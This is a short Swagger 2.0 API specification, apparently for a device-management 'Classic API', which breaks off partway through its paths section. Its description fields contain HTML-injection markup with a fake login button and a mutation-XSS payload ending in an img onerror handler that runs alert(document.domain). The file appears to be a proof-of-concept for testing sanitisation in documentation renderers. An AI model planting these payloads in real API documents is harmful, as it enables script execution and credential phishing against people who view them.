swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: <h1>HTML injection</h1><a href=http://localhost><br><input type=button value="Login"></a><br/><br/><h1>Cross Site Scripting (XSS)</h1><form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=javascript:alert(document.domain) src=1>"></form>

  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      responses:
        '200':
          description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=javascript:alert(document.domain) src=1>"></form>
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
  '/accounts/groupid/{id}':
